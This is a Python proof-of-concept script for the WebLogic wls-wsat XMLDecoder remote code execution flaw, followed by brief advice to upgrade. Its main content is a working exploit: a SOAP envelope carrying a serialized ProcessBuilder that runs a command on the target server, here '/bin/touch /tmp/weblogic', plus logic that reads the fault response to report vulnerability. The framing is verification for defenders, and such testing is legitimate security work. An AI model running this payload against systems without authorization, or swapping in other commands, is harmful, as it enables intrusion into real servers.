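#!/usr/bin/env python
# coding:utf-8
# @Date: 2017/12/22 17:11
# @File: weblogic_poc.py
# @Author: sevck ([email protected])
# @Link: http://www.qingteng.cn
# -------------------------------------------------------------------------
"""Verification check for the WebLogic wls-wsat XMLDecoder RCE.

The check is *active*: it POSTs a SOAP envelope whose WorkContext header
carries a serialized ``java.lang.ProcessBuilder`` that runs
``/bin/touch /tmp/weblogic``.  On a vulnerable host the command executes, so
a run leaves two artefacts that responders can search for:

* a POST to ``/wls-wsat/CoordinatorPortType`` with a ``<java>`` element
  inside the SOAP header (visible in access logs or a WAF), and
* the marker file ``/tmp/weblogic`` on the server.

Remediation: upgrade WebLogic to a patched release.
"""
import re
from sys import argv, stderr

import requests

# Browser-like headers; Content-Type must be text/xml for the SOAP endpoint.
heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8',
}


def poc(url):
    """Probe one WebLogic instance and report whether it looks vulnerable.

    Args:
        url: Target as ``host:port`` or a full ``http(s)://`` URL.  A missing
            scheme defaults to ``http://``; the wls-wsat endpoint path is
            appended.

    Returns:
        ``"Vulnerability"`` when the SOAP fault string matches one of the two
        signatures checked below, otherwise ``"No Vulnerability"``.  A failed
        request also yields ``"No Vulnerability"``, but a line is written to
        stderr so the caller can tell "not vulnerable" from "not reachable".
    """
    if not url.startswith("http"):
        url = "http://" + url
    # Strip trailing slashes so the endpoint is not requested as "//wls-wsat/...".
    url = url.rstrip("/") + '/wls-wsat/CoordinatorPortType'

    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="2">
                <void index="0">
                  <string>/bin/touch</string>
                </void>
                <void index="1">
                  <string>/tmp/weblogic</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''

    try:
        # NOTE(review): verify=False disables TLS certificate validation, so
        # an on-path party can alter the response and with it the verdict.
        # Kept because scanned hosts often present self-signed certificates.
        reply = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        fault = re.search(r"\<faultstring\>.*\<\/faultstring\>", reply.text)
        # No <faultstring> in the body means there is nothing to match against.
        response = fault.group(0) if fault else ""
    except requests.RequestException as err:
        # A transport failure says nothing about the patch level: report it
        # instead of silently folding it into "No Vulnerability".
        stderr.write("request to %s failed (%s); result is inconclusive\n" % (url, err))
        response = ""

    # The check treats a fault string that starts with the ProcessBuilder
    # class name, or with "0", as evidence the header payload was deserialized.
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        return "Vulnerability"
    return "No Vulnerability"


if __name__ == '__main__':
    if len(argv) == 1:
        print("python weblogic_poc.py url:port")
        raise SystemExit(0)
    result = poc(url=argv[1])
    print(result)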
Some remediation suggestions:
My personal advice is to update directly to the latest version; the old versions simply have too many problems. In a chat with Master Liao last night, he mentioned a submitted WebLogic RCE that has already been assigned a CVE and is waiting to be released.
Weblogic WLS RCE Vulnerability Verification POC